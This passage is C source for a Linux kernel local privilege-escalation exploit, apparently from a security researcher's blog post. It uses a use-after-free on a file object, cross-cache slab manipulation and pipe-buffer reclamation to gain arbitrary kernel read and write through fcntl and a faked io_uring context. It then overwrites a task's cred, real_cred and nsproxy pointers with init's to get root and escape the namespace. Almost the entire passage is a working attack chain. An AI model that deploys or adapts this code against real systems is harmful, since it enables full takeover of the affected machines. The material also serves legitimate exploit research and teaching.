    for (size_t i = 0; i < g_cc3_num; i++)
    {
        close(g_cc3_fds[i]);
    }
    usleep(100000);

    return;
}

// Cross-cache 5:
// Free an object for each slab we allocated in Step 1 to overflow the 
// partial list and get our empty slab in the partial list freed
void cc_5(void)
{
    //info("Freeing `filp` objects to overflow CPU partial list...");
    for (size_t i = 0; i < g_cc1_num; i++)
    {
        if (i % OBJS_PER_SLAB == 0)
        {
            close(g_cc1_fds[i]);
        }
    }
    usleep(100000);

    return;
}

// Reset all state associated with a cross-cache attempt
void cc_reset(void)
{
    // Close all the remaining FDs
    info("Resetting cross-cache state...");
    for (size_t i = 0; i < CROSS_CACHE_MAX; i++)
    {
        close(g_cc1_fds[i]);
        close(g_cc2_fds[i]);
        close(g_cc3_fds[i]);
    }

    // Reset number trackers
    g_cc1_num = 0;
    g_cc2_num = 0;
    g_cc3_num = 0;
}

// Do cross cache process
void do_cc(void)
{
    // Start cross-cache process
    cc_1();
    cc_2();

    // Allocate the victim filp
    alloc_victim_filp();

    // Free the victim filp
    do_uaf();

    // Resume cross-cache process
    cc_3();
    cc_4();
    cc_5();

    // Allow pages to be freed
    usleep(100000);
}

void reset_pipe_buf(void)
{
    char buf[4096] = { 0 };
    read(g_pipe.fd[PIPE_READ], buf, 4096);
}

void zero_pipe_buf(void)
{
    char buf[4096] = { 0 };
    write(g_pipe.fd[PIPE_WRITE], buf, 4096);
}

// Offset inside of inode to inode->i_write_hint
#define HINT_OFF 0x8fUL

// By using `fcntl(F_GET_RW_HINT)` we can read a single byte at
// file->inode->i_write_hint
uint64_t read_8_at(unsigned long addr)
{
    // Set the inode address
    uint64_t inode_addr_base = addr - HINT_OFF;

    // Set up the buffer for the arbitrary read
    unsigned char buf[4096] = { 0 };

    // Iterate 8 times to read 8 bytes
    uint64_t val = 0;
    for (size_t i = 0; i < 8; i++)
    {
        // Calculate inode address
        uint64_t target = inode_addr_base + i;

        // Set up a fake file 16 times (number of files per page), we don't know
        // yet which of the 16 slots our UAF file is at
        reset_pipe_buf();
        *(uint64_t *)&buf[0x20]  = target;
        *(uint64_t *)&buf[0x120] = target;
        *(uint64_t *)&buf[0x220] = target;
        *(uint64_t *)&buf[0x320] = target;
        *(uint64_t *)&buf[0x420] = target;
        *(uint64_t *)&buf[0x520] = target;
        *(uint64_t *)&buf[0x620] = target;
        *(uint64_t *)&buf[0x720] = target;
        *(uint64_t *)&buf[0x820] = target;
        *(uint64_t *)&buf[0x920] = target;
        *(uint64_t *)&buf[0xa20] = target;
        *(uint64_t *)&buf[0xb20] = target;
        *(uint64_t *)&buf[0xc20] = target;
        *(uint64_t *)&buf[0xd20] = target;
        *(uint64_t *)&buf[0xe20] = target;
        *(uint64_t *)&buf[0xf20] = target;

        // Create the content
        write(g_pipe.fd[PIPE_WRITE], buf, 4096);

        // Read one byte back
        uint64_t arg = 0;
        if (fcntl(g_uaf_fd, F_GET_RW_HINT, &arg) == -1)
        {
            err("`fcntl()` failed");
        };

        // Add to val
        val |= (arg << (i * 8));
    }

    return val;
}

void read_comm_at(unsigned long addr, char *comm)
{
    // Set the inode address
    uint64_t inode_addr_base = addr - HINT_OFF;

    // Set up the buffer for the arbitrary read
    unsigned char buf[4096] = { 0 };

    // Iterate 15 times to read 15 bytes
    for (size_t i = 0; i < 8; i++)
    {
        // Calculate inode address
        uint64_t target = inode_addr_base + i;

        // Set up a fake file 16 times (number of files per page), we don't know
        // yet which of the 16 slots our UAF file is at
        reset_pipe_buf();
        *(uint64_t *)&buf[0x20]  = target;
        *(uint64_t *)&buf[0x120] = target;
        *(uint64_t *)&buf[0x220] = target;
        *(uint64_t *)&buf[0x320] = target;
        *(uint64_t *)&buf[0x420] = target;
        *(uint64_t *)&buf[0x520] = target;
        *(uint64_t *)&buf[0x620] = target;
        *(uint64_t *)&buf[0x720] = target;
        *(uint64_t *)&buf[0x820] = target;
        *(uint64_t *)&buf[0x920] = target;
        *(uint64_t *)&buf[0xa20] = target;
        *(uint64_t *)&buf[0xb20] = target;
        *(uint64_t *)&buf[0xc20] = target;
        *(uint64_t *)&buf[0xd20] = target;
        *(uint64_t *)&buf[0xe20] = target;
        *(uint64_t *)&buf[0xf20] = target;

        // Create the content
        write(g_pipe.fd[PIPE_WRITE], buf, 4096);

        // Read one byte back
        uint64_t arg = 0;
        if (fcntl(g_uaf_fd, F_GET_RW_HINT, &arg) == -1)
        {
            err("`fcntl()` failed");
        };

        // Add to comm buf
        comm[i] = arg;
    }
}

void write_setup_ctx(char *buf, uint32_t what, uint64_t where)
{
    // Copy our copied real ring fd 
    memcpy(&buf[g_off], g_ring_copy, 256);

    // Set f->f_count to 1 
    uint64_t *count = (uint64_t *)&buf[g_off + 0x38];
    *count = 1;

    // Set f->private_data to our scratch space
    uint64_t *private_data = (uint64_t *)&buf[g_off + 0xc8];
    *private_data = g_scratch;

    // Set ctx->cqe_cached
    size_t cqe_cached = g_scratch + 0x240;
    cqe_cached &= 0xFFF;
    uint64_t *cached_ptr = (uint64_t *)&buf[cqe_cached];
    *cached_ptr = NULL_MEM;

    // Set ctx->cqe_sentinel
    size_t cqe_sentinel = g_scratch + 0x248;
    cqe_sentinel &= 0xFFF;
    uint64_t *sentinel_ptr = (uint64_t *)&buf[cqe_sentinel];

    // We need ctx->cqe_cached < ctx->cqe_sentinel
    *sentinel_ptr = NULL_MEM + 1;

    // Set ctx->rings so that ctx->rings->cq.tail is written to. That is at 
    // offset 0xc0 from cq base address
    size_t rings = g_scratch + 0x10;
    rings &= 0xFFF;
    uint64_t *rings_ptr = (uint64_t *)&buf[rings];
    *rings_ptr = where - 0xc0;

    // Set ctx->cached_cq_tail which is our what
    size_t cq_tail = g_scratch + 0x250;
    cq_tail &= 0xFFF;
    uint32_t *cq_tail_ptr = (uint32_t *)&buf[cq_tail];
    *cq_tail_ptr = what;

    // Set ctx->cq_wait the list head to itself (so that it's "empty")
    size_t real_cq_wait = g_scratch + 0x268;
    size_t cq_wait = (real_cq_wait & 0xFFF);
    uint64_t *cq_wait_ptr = (uint64_t *)&buf[cq_wait];
    *cq_wait_ptr = real_cq_wait;
}

void write_what_where(uint32_t what, uint64_t where)
{
    // Reset the page contents
    reset_pipe_buf();

    // Setup the fake file target ctx
    char buf[4096] = { 0 };
    write_setup_ctx(buf, what, where);

    // Set contents
    write(g_pipe.fd[PIPE_WRITE], buf, 4096);

    // Get an sqe
    struct io_uring_sqe *sqe = NULL;
    sqe = io_uring_get_sqe(&g_ring);
    if (!sqe)
    {
        err("`io_uring_get_sqe()` failed");
    }

    // Set values
    sqe->opcode = IORING_OP_MSG_RING;
    sqe->fd = g_uaf_fd;

    int ret = io_uring_submit(&g_ring);
    if (ret < 0)
    {
        err("`io_uring_submit()` failed");
    }

    // Wait for the completion
    struct io_uring_cqe *cqe;
    ret = io_uring_wait_cqe(&g_ring, &cqe);
}

// So in this kernel code path, after we're done with our write-what-where, the 
// what value actually gets incremented ++ style, so we have to decrement
// the values by one each time.
// Also, we only have a 4 byte write ability so we have to split up the 8 bytes
// into 2 separate writes
void overwrite_cred(void)
{
    uint32_t val_1 = g_cred_what & 0xFFFFFFFF;
    uint32_t val_2 = (g_cred_what >> 32) & 0xFFFFFFFF;

    write_what_where(val_1 - 1, g_cred_where);
    write_what_where(val_2 - 1, g_cred_where + 0x4);
}

void overwrite_real_cred(void)
{
    uint32_t val_1 = g_cred_what & 0xFFFFFFFF;
    uint32_t val_2 = (g_cred_what >> 32) & 0xFFFFFFFF;

    write_what_where(val_1 - 1, g_real_cred_where);
    write_what_where(val_2 - 1, g_real_cred_where + 0x4);
}

void overwrite_nsproxy(void)
{
    uint32_t val_1 = g_nsproxy_what & 0xFFFFFFFF;
    uint32_t val_2 = (g_nsproxy_what >> 32) & 0xFFFFFFFF;

    write_what_where(val_1 - 1, g_nsproxy_where);
    write_what_where(val_2 - 1, g_nsproxy_where + 0x4);
}

// Try to fuzzily validate leaked task addresses lol
int task_valid(uint64_t task)
{
    if ((uint16_t)(task >> 48) == 0xFFFF) { return 1; }
    else { return 0; } 
}

void traverse_tasks(void)
{    
    // Process name buf
    char current_comm[16] = { 0 };

    // Get the next task after init
    uint64_t current_next = read_8_at(g_init_task + TASKS_NEXT_OFF);
    uint64_t current = current_next - TASKS_NEXT_OFF;

    if (!task_valid(current))
    { 
        err("Invalid task after init: 0x%lx", current);    
    }

    // Read the comm
    read_comm_at(current + COMM_OFF, current_comm);
    //printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);

    // While we don't have NULL, traverse the list
    while (task_valid(current))
    {
        current_next = read_8_at(current_next);
        current = current_next - TASKS_NEXT_OFF;

        if (current == g_init_task) { break; }

        // Read the comm
        read_comm_at(current + COMM_OFF, current_comm);
        //printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);

        // If we find the target comm, save it
        if (!strcmp(current_comm, TARGET_TASK))
        {
            g_target_task = current;
        }

        // If we find our target comm, save it
        if (!strcmp(current_comm, OUR_TASK))
        {
            g_our_task = current;
        }
    }
}

void find_pipe_buf_addr(void)
{
    // Get the base of the files array
    uint64_t files_ptr = read_8_at(g_file_array);
    
    // Adjust the files_ptr to point to our fd in the array
    files_ptr += (sizeof(uint64_t) * g_uaf_fd);

    // Get the address of our UAF file struct
    uint64_t curr_file = read_8_at(files_ptr);

    // Calculate the offset
    g_off = curr_file & 0xFFF;

    // Set the globals
    g_file_addr = curr_file;
    g_pipe_buf = g_file_addr - g_off;

    return;
}

void make_ring_copy(void)
{
    // Get the base of the files array
    uint64_t files_ptr = read_8_at(g_file_array);
    
    // Adjust the files_ptr to point to our ring fd in the array
    files_ptr += (sizeof(uint64_t) * g_ring.ring_fd);

    // Get the address of our UAF file struct
    uint64_t curr_file = read_8_at(files_ptr);

    // Copy all the data into the buffer
    for (size_t i = 0; i < 32; i++)
    {
        uint64_t *val_ptr = (uint64_t *)&g_ring_copy[i * 8];
        *val_ptr = read_8_at(curr_file + (i * 8));
    }
}

// Here, all we're doing is determing what side of the page the UAF file is on,
// if its on the front half of the page, the back half is our scratch space
// and vice versa
void set_scratch_space(void)
{
    g_scratch = g_pipe_buf;
    if (g_off < 0x500) { g_scratch += 0x500; }
}

// We failed cross-cache stage, either because we didnt replace UAF object
void cc_fail(void)
{
    cc_reset();
    close(g_uaf_fd);
    g_uaf_fd = -1;
    release_pipe();
    create_pipe();
    sleep(1);
}

void write_pipe(unsigned char *buf)
{
    if (write(g_pipe.fd[PIPE_WRITE], buf, 4096) == -1)
    {
        err("`write()` failed");
    }
}

int main(int argc, char *argv[])
{
    info("Setting up exploit environment...");
    setup_env();

    // Create a debug buffer
    unsigned char buf[4096] = { 0 };
    memset(buf, 'A', 4096); 

retry_cc:
    // Do cross-cache attempt
    info("Attempting cross-cache...");
    do_cc();

    // Replace UAF file (and page) with pipe page
    write_pipe(buf);

    // Try to `lseek()` which should fail if we succeeded
    if (lseek(g_uaf_fd, 0, SEEK_SET) != -1)
    {
        printf("[!] Cross-cache failed, retrying...");
        cc_fail();
        goto retry_cc;
    }

    // Success
    info("Cross-cache succeeded");
    sleep(1);

    // Leak the `error_entry` pointer
    uint64_t error_entry = read_8_at(ERROR_ENTRY_ADDR);
    info("Leaked `error_entry` address: 0x%lx", error_entry);

    // Make sure it seems kernel-ish
    if ((uint16_t)(error_entry >> 48) != 0xFFFF)
    {
        err("Weird `error_entry` address: 0x%lx", error_entry);
    }

    // Set kernel base
    g_kern_base = error_entry - EE_OFF;
    info("Kernel base: 0x%lx", g_kern_base);

    // Read 8 bytes at that address and see if they match our signature
    uint64_t sig = read_8_at(g_kern_base);
    if (sig != KERNEL_SIGNATURE) 
    {
        err("Bad kernel signature: 0x%lx", sig);
    }

    // Set init_task
    g_init_task = g_kern_base + INIT_OFF;
    info("init_task @ 0x%lx", g_init_task);

    // Get the cred and nsproxy values
    g_cred_what = read_8_at(g_init_task + CRED_OFF);
    g_nsproxy_what = read_8_at(g_init_task + NSPROXY_OFF);

    if ((uint16_t)(g_cred_what >> 48) != 0xFFFF)
    {
        err("Weird init->cred value: 0x%lx", g_cred_what);
    }

    if ((uint16_t)(g_nsproxy_what >> 48) != 0xFFFF)
    {
        err("Weird init->nsproxy value: 0x%lx", g_nsproxy_what);
    }

    info("init cred address: 0x%lx", g_cred_what);
    info("init nsproxy address: 0x%lx", g_nsproxy_what);

    // Traverse the tasks list
    info("Traversing tasks linked list...");
    traverse_tasks();

    // Check to see if we succeeded
    if (!g_target_task) { err("Unable to find target task!"); }
    if (!g_our_task)    { err("Unable to find our task!"); }

    // We found the target task
    info("Found '%s' task @ 0x%lx", TARGET_TASK, g_target_task);
    info("Found '%s' task @ 0x%lx", OUR_TASK, g_our_task);

    // Set where gadgets
    g_cred_where = g_target_task + CRED_OFF;
    g_real_cred_where = g_target_task + REAL_CRED_OFF;
    g_nsproxy_where = g_target_task + NSPROXY_OFF;

    info("Target cred @ 0x%lx", g_cred_where);
    info("Target real_cred @ 0x%lx", g_real_cred_where);
    info("Target nsproxy @ 0x%lx", g_nsproxy_where);

    // Locate our file descriptor table
    g_files = g_our_task + FILES_OFF;
    g_fdt = read_8_at(g_files) + FDT_OFF;
    g_file_array = read_8_at(g_fdt) + FD_ARRAY_OFF;

    info("Our files @ 0x%lx", g_files);
    info("Our file descriptor table @ 0x%lx", g_fdt);
    info("Our file array @ 0x%lx", g_file_array);

    // Find our pipe address
    find_pipe_buf_addr();
    info("UAF file addr: 0x%lx", g_file_addr);
    info("Pipe buffer addr: 0x%lx", g_pipe_buf);

    // Set the global scratch space side of the page
    set_scratch_space();
    info("Scratch space base @ 0x%lx", g_scratch);

    // Make a copy of our real io_uring file descriptor since we need to fake
    // one
    info("Making copy of legitimate io_uring fd...");
    make_ring_copy();
    info("Copy done");

    // Overwrite our task's cred with init's
    info("Overwriting our cred with init's...");
    overwrite_cred();

    // Make sure it's correct
    uint64_t check_cred = read_8_at(g_cred_where);
    if (check_cred != g_cred_what)
    {
        err("check_cred: 0x%lx != g_cred_what: 0x%lx",
            check_cred, g_cred_what);
    }

    // Overwrite our real_cred with init's cred
    sleep(1);
    info("Overwriting our real_cred with init's...");
    overwrite_real_cred();

    // Make sure it's correct
    check_cred = read_8_at(g_real_cred_where);
    if (check_cred != g_cred_what)
    {
        err("check_cred: 0x%lx != g_cred_what: 0x%lx", check_cred, g_cred_what);
    }

    // Overwrite our nsproxy with init's
    sleep(1);
    info("Overwriting our nsproxy with init's...");
    overwrite_nsproxy();

    // Make sure it's correct
    check_cred = read_8_at(g_nsproxy_where);
    if (check_cred != g_nsproxy_what)
    {
        err("check_rec: 0x%lx != g_nsproxy_what: 0x%lx",
            check_cred, g_nsproxy_what);
    }

    info("Creds and namespace look good!");
    
    // Let the child loose
    *(int *)g_shmem = 0x1337;

    sleep(3000);
}

Share on

Twitter Facebook Google+ LinkedIn

h0mbre